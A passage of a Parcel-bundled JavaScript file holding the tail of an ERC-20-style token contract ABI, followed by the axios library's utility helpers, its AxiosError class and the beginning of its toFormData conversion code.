decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]');


var $49196067e703828c$exports = {};
"use strict";
function $e5cb5cefd6507f7e$export$2e2bcd8739ae039(fn, thisArg) {
    return function wrap() {
        return fn.apply(thisArg, arguments);
    };
}


"use strict";
// utils is a library of generic helper functions non-specific to axios
const { toString: $c319b2c832c2914a$var$toString } = Object.prototype;
const { getPrototypeOf: $c319b2c832c2914a$var$getPrototypeOf } = Object;
const $c319b2c832c2914a$var$kindOf = ((cache)=>(thing)=>{
        const str = $c319b2c832c2914a$var$toString.call(thing);
        return cache[str] || (cache[str] = str.slice(8, -1).toLowerCase());
    })(Object.create(null));
const $c319b2c832c2914a$var$kindOfTest = (type)=>{
    type = type.toLowerCase();
    return (thing)=>$c319b2c832c2914a$var$kindOf(thing) === type;
};
const $c319b2c832c2914a$var$typeOfTest = (type)=>(thing)=>typeof thing === type;
/**
 * Determine if a value is an Array
 *
 * @param {Object} val The value to test
 *
 * @returns {boolean} True if value is an Array, otherwise false
 */ const { isArray: $c319b2c832c2914a$var$isArray } = Array;
/**
 * Determine if a value is undefined
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if the value is undefined, otherwise false
 */ const $c319b2c832c2914a$var$isUndefined = $c319b2c832c2914a$var$typeOfTest("undefined");
/**
 * Determine if a value is a Buffer
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a Buffer, otherwise false
 */ function $c319b2c832c2914a$var$isBuffer(val) {
    return val !== null && !$c319b2c832c2914a$var$isUndefined(val) && val.constructor !== null && !$c319b2c832c2914a$var$isUndefined(val.constructor) && $c319b2c832c2914a$var$isFunction(val.constructor.isBuffer) && val.constructor.isBuffer(val);
}
/**
 * Determine if a value is an ArrayBuffer
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is an ArrayBuffer, otherwise false
 */ const $c319b2c832c2914a$var$isArrayBuffer = $c319b2c832c2914a$var$kindOfTest("ArrayBuffer");
/**
 * Determine if a value is a view on an ArrayBuffer
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a view on an ArrayBuffer, otherwise false
 */ function $c319b2c832c2914a$var$isArrayBufferView(val) {
    let result;
    if (typeof ArrayBuffer !== "undefined" && ArrayBuffer.isView) result = ArrayBuffer.isView(val);
    else result = val && val.buffer && $c319b2c832c2914a$var$isArrayBuffer(val.buffer);
    return result;
}
/**
 * Determine if a value is a String
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a String, otherwise false
 */ const $c319b2c832c2914a$var$isString = $c319b2c832c2914a$var$typeOfTest("string");
/**
 * Determine if a value is a Function
 *
 * @param {*} val The value to test
 * @returns {boolean} True if value is a Function, otherwise false
 */ const $c319b2c832c2914a$var$isFunction = $c319b2c832c2914a$var$typeOfTest("function");
/**
 * Determine if a value is a Number
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a Number, otherwise false
 */ const $c319b2c832c2914a$var$isNumber = $c319b2c832c2914a$var$typeOfTest("number");
/**
 * Determine if a value is an Object
 *
 * @param {*} thing The value to test
 *
 * @returns {boolean} True if value is an Object, otherwise false
 */ const $c319b2c832c2914a$var$isObject = (thing)=>thing !== null && typeof thing === "object";
/**
 * Determine if a value is a Boolean
 *
 * @param {*} thing The value to test
 * @returns {boolean} True if value is a Boolean, otherwise false
 */ const $c319b2c832c2914a$var$isBoolean = (thing)=>thing === true || thing === false;
/**
 * Determine if a value is a plain Object
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a plain Object, otherwise false
 */ const $c319b2c832c2914a$var$isPlainObject = (val)=>{
    if ($c319b2c832c2914a$var$kindOf(val) !== "object") return false;
    const prototype = $c319b2c832c2914a$var$getPrototypeOf(val);
    return (prototype === null || prototype === Object.prototype || Object.getPrototypeOf(prototype) === null) && !(Symbol.toStringTag in val) && !(Symbol.iterator in val);
};
/**
 * Determine if a value is a Date
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a Date, otherwise false
 */ const $c319b2c832c2914a$var$isDate = $c319b2c832c2914a$var$kindOfTest("Date");
/**
 * Determine if a value is a File
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a File, otherwise false
 */ const $c319b2c832c2914a$var$isFile = $c319b2c832c2914a$var$kindOfTest("File");
/**
 * Determine if a value is a Blob
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a Blob, otherwise false
 */ const $c319b2c832c2914a$var$isBlob = $c319b2c832c2914a$var$kindOfTest("Blob");
/**
 * Determine if a value is a FileList
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a File, otherwise false
 */ const $c319b2c832c2914a$var$isFileList = $c319b2c832c2914a$var$kindOfTest("FileList");
/**
 * Determine if a value is a Stream
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a Stream, otherwise false
 */ const $c319b2c832c2914a$var$isStream = (val)=>$c319b2c832c2914a$var$isObject(val) && $c319b2c832c2914a$var$isFunction(val.pipe);
/**
 * Determine if a value is a FormData
 *
 * @param {*} thing The value to test
 *
 * @returns {boolean} True if value is an FormData, otherwise false
 */ const $c319b2c832c2914a$var$isFormData = (thing)=>{
    let kind;
    return thing && (typeof FormData === "function" && thing instanceof FormData || $c319b2c832c2914a$var$isFunction(thing.append) && ((kind = $c319b2c832c2914a$var$kindOf(thing)) === "formdata" || // detect form-data instance
    kind === "object" && $c319b2c832c2914a$var$isFunction(thing.toString) && thing.toString() === "[object FormData]"));
};
/**
 * Determine if a value is a URLSearchParams object
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a URLSearchParams object, otherwise false
 */ const $c319b2c832c2914a$var$isURLSearchParams = $c319b2c832c2914a$var$kindOfTest("URLSearchParams");
/**
 * Trim excess whitespace off the beginning and end of a string
 *
 * @param {String} str The String to trim
 *
 * @returns {String} The String freed of excess whitespace
 */ const $c319b2c832c2914a$var$trim = (str)=>str.trim ? str.trim() : str.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g, "");
/**
 * Iterate over an Array or an Object invoking a function for each item.
 *
 * If `obj` is an Array callback will be called passing
 * the value, index, and complete array for each item.
 *
 * If 'obj' is an Object callback will be called passing
 * the value, key, and complete object for each property.
 *
 * @param {Object|Array} obj The object to iterate
 * @param {Function} fn The callback to invoke for each item
 *
 * @param {Boolean} [allOwnKeys = false]
 * @returns {any}
 */ function $c319b2c832c2914a$var$forEach(obj, fn, { allOwnKeys: allOwnKeys = false } = {}) {
    // Don't bother if no value provided
    if (obj === null || typeof obj === "undefined") return;
    let i;
    let l;
    // Force an array if not already something iterable
    if (typeof obj !== "object") /*eslint no-param-reassign:0*/ obj = [
        obj
    ];
    if ($c319b2c832c2914a$var$isArray(obj)) // Iterate over array values
    for(i = 0, l = obj.length; i < l; i++)fn.call(null, obj[i], i, obj);
    else {
        // Iterate over object keys
        const keys = allOwnKeys ? Object.getOwnPropertyNames(obj) : Object.keys(obj);
        const len = keys.length;
        let key;
        for(i = 0; i < len; i++){
            key = keys[i];
            fn.call(null, obj[key], key, obj);
        }
    }
}
function $c319b2c832c2914a$var$findKey(obj, key) {
    key = key.toLowerCase();
    const keys = Object.keys(obj);
    let i = keys.length;
    let _key;
    while(i-- > 0){
        _key = keys[i];
        if (key === _key.toLowerCase()) return _key;
    }
    return null;
}
const $c319b2c832c2914a$var$_global = (()=>{
    /*eslint no-undef:0*/ if (typeof globalThis !== "undefined") return globalThis;
    return typeof self !== "undefined" ? self : typeof window !== "undefined" ? window : $parcel$global;
})();
const $c319b2c832c2914a$var$isContextDefined = (context)=>!$c319b2c832c2914a$var$isUndefined(context) && context !== $c319b2c832c2914a$var$_global;
/**
 * Accepts varargs expecting each argument to be an object, then
 * immutably merges the properties of each object and returns result.
 *
 * When multiple objects contain the same key the later object in
 * the arguments list will take precedence.
 *
 * Example:
 *
 * ```js
 * var result = merge({foo: 123}, {foo: 456});
 * console.log(result.foo); // outputs 456
 * ```
 *
 * @param {Object} obj1 Object to merge
 *
 * @returns {Object} Result of all merge properties
 */ function $c319b2c832c2914a$var$merge() {
    const { caseless: caseless } = $c319b2c832c2914a$var$isContextDefined(this) && this || {};
    const result = {};
    const assignValue = (val, key)=>{
        const targetKey = caseless && $c319b2c832c2914a$var$findKey(result, key) || key;
        if ($c319b2c832c2914a$var$isPlainObject(result[targetKey]) && $c319b2c832c2914a$var$isPlainObject(val)) result[targetKey] = $c319b2c832c2914a$var$merge(result[targetKey], val);
        else if ($c319b2c832c2914a$var$isPlainObject(val)) result[targetKey] = $c319b2c832c2914a$var$merge({}, val);
        else if ($c319b2c832c2914a$var$isArray(val)) result[targetKey] = val.slice();
        else result[targetKey] = val;
    };
    for(let i = 0, l = arguments.length; i < l; i++)arguments[i] && $c319b2c832c2914a$var$forEach(arguments[i], assignValue);
    return result;
}
/**
 * Extends object a by mutably adding to it the properties of object b.
 *
 * @param {Object} a The object to be extended
 * @param {Object} b The object to copy properties from
 * @param {Object} thisArg The object to bind function to
 *
 * @param {Boolean} [allOwnKeys]
 * @returns {Object} The resulting value of object a
 */ const $c319b2c832c2914a$var$extend = (a, b, thisArg, { allOwnKeys: allOwnKeys } = {})=>{
    $c319b2c832c2914a$var$forEach(b, (val, key)=>{
        if (thisArg && $c319b2c832c2914a$var$isFunction(val)) a[key] = (0, $e5cb5cefd6507f7e$export$2e2bcd8739ae039)(val, thisArg);
        else a[key] = val;
    }, {
        allOwnKeys: allOwnKeys
    });
    return a;
};
/**
 * Remove byte order marker. This catches EF BB BF (the UTF-8 BOM)
 *
 * @param {string} content with BOM
 *
 * @returns {string} content value without BOM
 */ const $c319b2c832c2914a$var$stripBOM = (content)=>{
    if (content.charCodeAt(0) === 0xFEFF) content = content.slice(1);
    return content;
};
/**
 * Inherit the prototype methods from one constructor into another
 * @param {function} constructor
 * @param {function} superConstructor
 * @param {object} [props]
 * @param {object} [descriptors]
 *
 * @returns {void}
 */ const $c319b2c832c2914a$var$inherits = (constructor, superConstructor, props, descriptors)=>{
    constructor.prototype = Object.create(superConstructor.prototype, descriptors);
    constructor.prototype.constructor = constructor;
    Object.defineProperty(constructor, "super", {
        value: superConstructor.prototype
    });
    props && Object.assign(constructor.prototype, props);
};
/**
 * Resolve object with deep prototype chain to a flat object
 * @param {Object} sourceObj source object
 * @param {Object} [destObj]
 * @param {Function|Boolean} [filter]
 * @param {Function} [propFilter]
 *
 * @returns {Object}
 */ const $c319b2c832c2914a$var$toFlatObject = (sourceObj, destObj, filter, propFilter)=>{
    let props;
    let i;
    let prop;
    const merged = {};
    destObj = destObj || {};
    // eslint-disable-next-line no-eq-null,eqeqeq
    if (sourceObj == null) return destObj;
    do {
        props = Object.getOwnPropertyNames(sourceObj);
        i = props.length;
        while(i-- > 0){
            prop = props[i];
            if ((!propFilter || propFilter(prop, sourceObj, destObj)) && !merged[prop]) {
                destObj[prop] = sourceObj[prop];
                merged[prop] = true;
            }
        }
        sourceObj = filter !== false && $c319b2c832c2914a$var$getPrototypeOf(sourceObj);
    }while (sourceObj && (!filter || filter(sourceObj, destObj)) && sourceObj !== Object.prototype);
    return destObj;
};
/**
 * Determines whether a string ends with the characters of a specified string
 *
 * @param {String} str
 * @param {String} searchString
 * @param {Number} [position= 0]
 *
 * @returns {boolean}
 */ const $c319b2c832c2914a$var$endsWith = (str, searchString, position)=>{
    str = String(str);
    if (position === undefined || position > str.length) position = str.length;
    position -= searchString.length;
    const lastIndex = str.indexOf(searchString, position);
    return lastIndex !== -1 && lastIndex === position;
};
/**
 * Returns new array from array like object or null if failed
 *
 * @param {*} [thing]
 *
 * @returns {?Array}
 */ const $c319b2c832c2914a$var$toArray = (thing)=>{
    if (!thing) return null;
    if ($c319b2c832c2914a$var$isArray(thing)) return thing;
    let i = thing.length;
    if (!$c319b2c832c2914a$var$isNumber(i)) return null;
    const arr = new Array(i);
    while(i-- > 0)arr[i] = thing[i];
    return arr;
};
/**
 * Checking if the Uint8Array exists and if it does, it returns a function that checks if the
 * thing passed in is an instance of Uint8Array
 *
 * @param {TypedArray}
 *
 * @returns {Array}
 */ // eslint-disable-next-line func-names
const $c319b2c832c2914a$var$isTypedArray = ((TypedArray)=>{
    // eslint-disable-next-line func-names
    return (thing)=>{
        return TypedArray && thing instanceof TypedArray;
    };
})(typeof Uint8Array !== "undefined" && $c319b2c832c2914a$var$getPrototypeOf(Uint8Array));
/**
 * For each entry in the object, call the function with the key and value.
 *
 * @param {Object<any, any>} obj - The object to iterate over.
 * @param {Function} fn - The function to call for each entry.
 *
 * @returns {void}
 */ const $c319b2c832c2914a$var$forEachEntry = (obj, fn)=>{
    const generator = obj && obj[Symbol.iterator];
    const iterator = generator.call(obj);
    let result;
    while((result = iterator.next()) && !result.done){
        const pair = result.value;
        fn.call(obj, pair[0], pair[1]);
    }
};
/**
 * It takes a regular expression and a string, and returns an array of all the matches
 *
 * @param {string} regExp - The regular expression to match against.
 * @param {string} str - The string to search.
 *
 * @returns {Array<boolean>}
 */ const $c319b2c832c2914a$var$matchAll = (regExp, str)=>{
    let matches;
    const arr = [];
    while((matches = regExp.exec(str)) !== null)arr.push(matches);
    return arr;
};
/* Checking if the kindOfTest function returns true when passed an HTMLFormElement. */ const $c319b2c832c2914a$var$isHTMLForm = $c319b2c832c2914a$var$kindOfTest("HTMLFormElement");
const $c319b2c832c2914a$var$toCamelCase = (str)=>{
    return str.toLowerCase().replace(/[-_\s]([a-z\d])(\w*)/g, function replacer(m, p1, p2) {
        return p1.toUpperCase() + p2;
    });
};
/* Creating a function that will check if an object has a property. */ const $c319b2c832c2914a$var$hasOwnProperty = (({ hasOwnProperty: hasOwnProperty })=>(obj, prop)=>hasOwnProperty.call(obj, prop))(Object.prototype);
/**
 * Determine if a value is a RegExp object
 *
 * @param {*} val The value to test
 *
 * @returns {boolean} True if value is a RegExp object, otherwise false
 */ const $c319b2c832c2914a$var$isRegExp = $c319b2c832c2914a$var$kindOfTest("RegExp");
const $c319b2c832c2914a$var$reduceDescriptors = (obj, reducer)=>{
    const descriptors = Object.getOwnPropertyDescriptors(obj);
    const reducedDescriptors = {};
    $c319b2c832c2914a$var$forEach(descriptors, (descriptor, name)=>{
        if (reducer(descriptor, name, obj) !== false) reducedDescriptors[name] = descriptor;
    });
    Object.defineProperties(obj, reducedDescriptors);
};
/**
 * Makes all methods read-only
 * @param {Object} obj
 */ const $c319b2c832c2914a$var$freezeMethods = (obj)=>{
    $c319b2c832c2914a$var$reduceDescriptors(obj, (descriptor, name)=>{
        // skip restricted props in strict mode
        if ($c319b2c832c2914a$var$isFunction(obj) && [
            "arguments",
            "caller",
            "callee"
        ].indexOf(name) !== -1) return false;
        const value = obj[name];
        if (!$c319b2c832c2914a$var$isFunction(value)) return;
        descriptor.enumerable = false;
        if ("writable" in descriptor) {
            descriptor.writable = false;
            return;
        }
        if (!descriptor.set) descriptor.set = ()=>{
            throw Error("Can not rewrite read-only method '" + name + "'");
        };
    });
};
const $c319b2c832c2914a$var$toObjectSet = (arrayOrString, delimiter)=>{
    const obj = {};
    const define = (arr)=>{
        arr.forEach((value)=>{
            obj[value] = true;
        });
    };
    $c319b2c832c2914a$var$isArray(arrayOrString) ? define(arrayOrString) : define(String(arrayOrString).split(delimiter));
    return obj;
};
const $c319b2c832c2914a$var$noop = ()=>{};
const $c319b2c832c2914a$var$toFiniteNumber = (value, defaultValue)=>{
    value = +value;
    return Number.isFinite(value) ? value : defaultValue;
};
const $c319b2c832c2914a$var$ALPHA = "abcdefghijklmnopqrstuvwxyz";
const $c319b2c832c2914a$var$DIGIT = "0123456789";
const $c319b2c832c2914a$var$ALPHABET = {
    DIGIT: $c319b2c832c2914a$var$DIGIT,
    ALPHA: $c319b2c832c2914a$var$ALPHA,
    ALPHA_DIGIT: $c319b2c832c2914a$var$ALPHA + $c319b2c832c2914a$var$ALPHA.toUpperCase() + $c319b2c832c2914a$var$DIGIT
};
const $c319b2c832c2914a$var$generateString = (size = 16, alphabet = $c319b2c832c2914a$var$ALPHABET.ALPHA_DIGIT)=>{
    let str = "";
    const { length: length } = alphabet;
    while(size--)str += alphabet[Math.random() * length | 0];
    return str;
};
/**
 * If the thing is a FormData object, return true, otherwise return false.
 *
 * @param {unknown} thing - The thing to check.
 *
 * @returns {boolean}
 */ function $c319b2c832c2914a$var$isSpecCompliantForm(thing) {
    return !!(thing && $c319b2c832c2914a$var$isFunction(thing.append) && thing[Symbol.toStringTag] === "FormData" && thing[Symbol.iterator]);
}
const $c319b2c832c2914a$var$toJSONObject = (obj)=>{
    const stack = new Array(10);
    const visit = (source, i)=>{
        if ($c319b2c832c2914a$var$isObject(source)) {
            if (stack.indexOf(source) >= 0) return;
            if (!("toJSON" in source)) {
                stack[i] = source;
                const target = $c319b2c832c2914a$var$isArray(source) ? [] : {};
                $c319b2c832c2914a$var$forEach(source, (value, key)=>{
                    const reducedValue = visit(value, i + 1);
                    !$c319b2c832c2914a$var$isUndefined(reducedValue) && (target[key] = reducedValue);
                });
                stack[i] = undefined;
                return target;
            }
        }
        return source;
    };
    return visit(obj, 0);
};
const $c319b2c832c2914a$var$isAsyncFn = $c319b2c832c2914a$var$kindOfTest("AsyncFunction");
const $c319b2c832c2914a$var$isThenable = (thing)=>thing && ($c319b2c832c2914a$var$isObject(thing) || $c319b2c832c2914a$var$isFunction(thing)) && $c319b2c832c2914a$var$isFunction(thing.then) && $c319b2c832c2914a$var$isFunction(thing.catch);
var $c319b2c832c2914a$export$2e2bcd8739ae039 = {
    isArray: $c319b2c832c2914a$var$isArray,
    isArrayBuffer: $c319b2c832c2914a$var$isArrayBuffer,
    isBuffer: $c319b2c832c2914a$var$isBuffer,
    isFormData: $c319b2c832c2914a$var$isFormData,
    isArrayBufferView: $c319b2c832c2914a$var$isArrayBufferView,
    isString: $c319b2c832c2914a$var$isString,
    isNumber: $c319b2c832c2914a$var$isNumber,
    isBoolean: $c319b2c832c2914a$var$isBoolean,
    isObject: $c319b2c832c2914a$var$isObject,
    isPlainObject: $c319b2c832c2914a$var$isPlainObject,
    isUndefined: $c319b2c832c2914a$var$isUndefined,
    isDate: $c319b2c832c2914a$var$isDate,
    isFile: $c319b2c832c2914a$var$isFile,
    isBlob: $c319b2c832c2914a$var$isBlob,
    isRegExp: $c319b2c832c2914a$var$isRegExp,
    isFunction: $c319b2c832c2914a$var$isFunction,
    isStream: $c319b2c832c2914a$var$isStream,
    isURLSearchParams: $c319b2c832c2914a$var$isURLSearchParams,
    isTypedArray: $c319b2c832c2914a$var$isTypedArray,
    isFileList: $c319b2c832c2914a$var$isFileList,
    forEach: $c319b2c832c2914a$var$forEach,
    merge: $c319b2c832c2914a$var$merge,
    extend: $c319b2c832c2914a$var$extend,
    trim: $c319b2c832c2914a$var$trim,
    stripBOM: $c319b2c832c2914a$var$stripBOM,
    inherits: $c319b2c832c2914a$var$inherits,
    toFlatObject: $c319b2c832c2914a$var$toFlatObject,
    kindOf: $c319b2c832c2914a$var$kindOf,
    kindOfTest: $c319b2c832c2914a$var$kindOfTest,
    endsWith: $c319b2c832c2914a$var$endsWith,
    toArray: $c319b2c832c2914a$var$toArray,
    forEachEntry: $c319b2c832c2914a$var$forEachEntry,
    matchAll: $c319b2c832c2914a$var$matchAll,
    isHTMLForm: $c319b2c832c2914a$var$isHTMLForm,
    hasOwnProperty: $c319b2c832c2914a$var$hasOwnProperty,
    hasOwnProp: $c319b2c832c2914a$var$hasOwnProperty,
    reduceDescriptors: $c319b2c832c2914a$var$reduceDescriptors,
    freezeMethods: $c319b2c832c2914a$var$freezeMethods,
    toObjectSet: $c319b2c832c2914a$var$toObjectSet,
    toCamelCase: $c319b2c832c2914a$var$toCamelCase,
    noop: $c319b2c832c2914a$var$noop,
    toFiniteNumber: $c319b2c832c2914a$var$toFiniteNumber,
    findKey: $c319b2c832c2914a$var$findKey,
    global: $c319b2c832c2914a$var$_global,
    isContextDefined: $c319b2c832c2914a$var$isContextDefined,
    ALPHABET: $c319b2c832c2914a$var$ALPHABET,
    generateString: $c319b2c832c2914a$var$generateString,
    isSpecCompliantForm: $c319b2c832c2914a$var$isSpecCompliantForm,
    toJSONObject: $c319b2c832c2914a$var$toJSONObject,
    isAsyncFn: $c319b2c832c2914a$var$isAsyncFn,
    isThenable: $c319b2c832c2914a$var$isThenable
};







"use strict";
/**
 * Create an Error with the specified message, config, error code, request and response.
 *
 * @param {string} message The error message.
 * @param {string} [code] The error code (for example, 'ECONNABORTED').
 * @param {Object} [config] The config.
 * @param {Object} [request] The request.
 * @param {Object} [response] The response.
 *
 * @returns {Error} The created error.
 */ function $4e2395edb77acf3a$var$AxiosError(message, code, config, request, response) {
    Error.call(this);
    if (Error.captureStackTrace) Error.captureStackTrace(this, this.constructor);
    else this.stack = new Error().stack;
    this.message = message;
    this.name = "AxiosError";
    code && (this.code = code);
    config && (this.config = config);
    request && (this.request = request);
    response && (this.response = response);
}
(0, $c319b2c832c2914a$export$2e2bcd8739ae039).inherits($4e2395edb77acf3a$var$AxiosError, Error, {
    toJSON: function toJSON() {
        return {
            // Standard
            message: this.message,
            name: this.name,
            // Microsoft
            description: this.description,
            number: this.number,
            // Mozilla
            fileName: this.fileName,
            lineNumber: this.lineNumber,
            columnNumber: this.columnNumber,
            stack: this.stack,
            // Axios
            config: (0, $c319b2c832c2914a$export$2e2bcd8739ae039).toJSONObject(this.config),
            code: this.code,
            status: this.response && this.response.status ? this.response.status : null
        };
    }
});
const $4e2395edb77acf3a$var$prototype = $4e2395edb77acf3a$var$AxiosError.prototype;
const $4e2395edb77acf3a$var$descriptors = {};
[
    "ERR_BAD_OPTION_VALUE",
    "ERR_BAD_OPTION",
    "ECONNABORTED",
    "ETIMEDOUT",
    "ERR_NETWORK",
    "ERR_FR_TOO_MANY_REDIRECTS",
    "ERR_DEPRECATED",
    "ERR_BAD_RESPONSE",
    "ERR_BAD_REQUEST",
    "ERR_CANCELED",
    "ERR_NOT_SUPPORT",
    "ERR_INVALID_URL"
].forEach((code)=>{
    $4e2395edb77acf3a$var$descriptors[code] = {
        value: code
    };
});
Object.defineProperties($4e2395edb77acf3a$var$AxiosError, $4e2395edb77acf3a$var$descriptors);
Object.defineProperty($4e2395edb77acf3a$var$prototype, "isAxiosError", {
    value: true
});
// eslint-disable-next-line func-names
$4e2395edb77acf3a$var$AxiosError.from = (error, code, config, request, response, customProps)=>{
    const axiosError = Object.create($4e2395edb77acf3a$var$prototype);
    (0, $c319b2c832c2914a$export$2e2bcd8739ae039).toFlatObject(error, axiosError, function filter(obj) {
        return obj !== Error.prototype;
    }, (prop)=>{
        return prop !== "isAxiosError";
    });
    $4e2395edb77acf3a$var$AxiosError.call(axiosError, error.message, code, config, request, response);
    axiosError.cause = error;
    axiosError.name = error.name;
    customProps && Object.assign(axiosError, customProps);
    return axiosError;
};
var $4e2395edb77acf3a$export$2e2bcd8739ae039 = $4e2395edb77acf3a$var$AxiosError;


// eslint-disable-next-line strict
var $4023ac50ad132196$export$2e2bcd8739ae039 = null;



var $6ZWSX = parcelRequire("6ZWSX");
var $e6cbd383b18c9625$require$Buffer = $6ZWSX.Buffer;
"use strict";
/**
 * Determines if the given thing is a array or js object.
 *
 * @param {string} thing - The object or array to be visited.
 *
 * @returns {boolean}
 */ function $e6cbd383b18c9625$var$isVisitable(thing) {
    return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isPlainObject(thing) || (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(thing);
}
/**
 * It removes the brackets from the end of a string
 *
 * @param {string} key - The key of the parameter.
 *
 * @returns {string} the key without the brackets.
 */ function $e6cbd383b18c9625$var$removeBrackets(key) {
    return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).endsWith(key, "[]") ? key.slice(0, -2) : key;
}
/**
 * It takes a path, a key, and a boolean, and returns a string
 *
 * @param {string} path - The path to the current key.
 * @param {string} key - The key of the current object being iterated over.
 * @param {string} dots - If true, the key will be rendered with dots instead of brackets.
 *
 * @returns {string} The path to the current key.
 */ function $e6cbd383b18c9625$var$renderKey(path, key, dots) {
    if (!path) return key;
    return path.concat(key).map(function each(token, i) {
        // eslint-disable-next-line no-param-reassign
        token = $e6cbd383b18c9625$var$removeBrackets(token);
        return !dots && i ? "[" + token + "]" : token;
    }).join(dots ? "." : "");
}
/**
 * If the array is an array and none of its elements are visitable, then it's a flat array.
 *
 * @param {Array<any>} arr - The array to check
 *
 * @returns {boolean}
 */ function $e6cbd383b18c9625$var$isFlatArray(arr) {
    return (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(arr) && !arr.some($e6cbd383b18c9625$var$isVisitable);
}
const $e6cbd383b18c9625$var$predicates = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).toFlatObject((0, $c319b2c832c2914a$export$2e2bcd8739ae039), {}, null, function filter(prop) {
    return /^is[A-Z]/.test(prop);
});
/**
 * Convert a data object to FormData
 *
 * @param {Object} obj
 * @param {?Object} [formData]
 * @param {?Object} [options]
 * @param {Function} [options.visitor]
 * @param {Boolean} [options.metaTokens = true]
 * @param {Boolean} [options.dots = false]
 * @param {?Boolean} [options.indexes = false]
 *
 * @returns {Object}
 **/ /**
 * It converts an object into a FormData object
 *
 * @param {Object<any, any>} obj - The object to convert to form data.
 * @param {string} formData - The FormData object to append to.
 * @param {Object<string, any>} options
 *
 * @returns
 */ function $e6cbd383b18c9625$var$toFormData(obj, formData, options) {
    if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isObject(obj)) throw new TypeError("target must be an object");
    // eslint-disable-next-line no-param-reassign
    formData = formData || new ((0, $4023ac50ad132196$export$2e2bcd8739ae039) || FormData)();
    // eslint-disable-next-line no-param-reassign
    options = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).toFlatObject(options, {
        metaTokens: true,
        dots: false,
        indexes: false
    }, false, function defined(option, source) {
        // eslint-disable-next-line no-eq-null,eqeqeq
        return !(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isUndefined(source[option]);
    });
    const metaTokens = options.metaTokens;
    // eslint-disable-next-line no-use-before-define
    const visitor = options.visitor || defaultVisitor;
    const dots = options.dots;
    const indexes = options.indexes;
    const _Blob = options.Blob || typeof Blob !== "undefined" && Blob;
    const useBlob = _Blob && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isSpecCompliantForm(formData);
    if (!(0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFunction(visitor)) throw new TypeError("visitor must be a function");
    function convertValue(value) {
        if (value === null) return "";
        if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isDate(value)) return value.toISOString();
        if (!useBlob && (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isBlob(value)) throw new (0, $4e2395edb77acf3a$export$2e2bcd8739ae039)("Blob is not supported. Use a Buffer instead.");
        if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArrayBuffer(value) || (0, $c319b2c832c2914a$export$2e2bcd8739ae039).isTypedArray(value)) return useBlob && typeof Blob === "function" ? new Blob([
            value
        ]) : $e6cbd383b18c9625$require$Buffer.from(value);
        return value;
    }
    /**
   * Default visitor.
   *
   * @param {*} value
   * @param {String|Number} key
   * @param {Array<String|Number>} path
   * @this {FormData}
   *
   * @returns {boolean} return true to visit the each prop of the value recursively
   */ function defaultVisitor(value, key, path) {
        let arr = value;
        if (value && !path && typeof value === "object") {
            if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).endsWith(key, "{}")) {
                // eslint-disable-next-line no-param-reassign
                key = metaTokens ? key : key.slice(0, -2);
                // eslint-disable-next-line no-param-reassign
                value = JSON.stringify(value);
            } else if ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isArray(value) && $e6cbd383b18c9625$var$isFlatArray(value) || ((0, $c319b2c832c2914a$export$2e2bcd8739ae039).isFileList(value) || (0, $c319b2c832c2914a$export$2e2bcd8739ae039).endsWith(key, "[]")) && (arr = (0, $c319b2c832c2914a$export$2e2bcd8739ae039).toArray(value))) {
                // eslint-disable-next-line no-param-reassign
                key = $e6cbd383b18c9625$var$removeBrackets(key);
                arr.forEach(function each(el, index) {
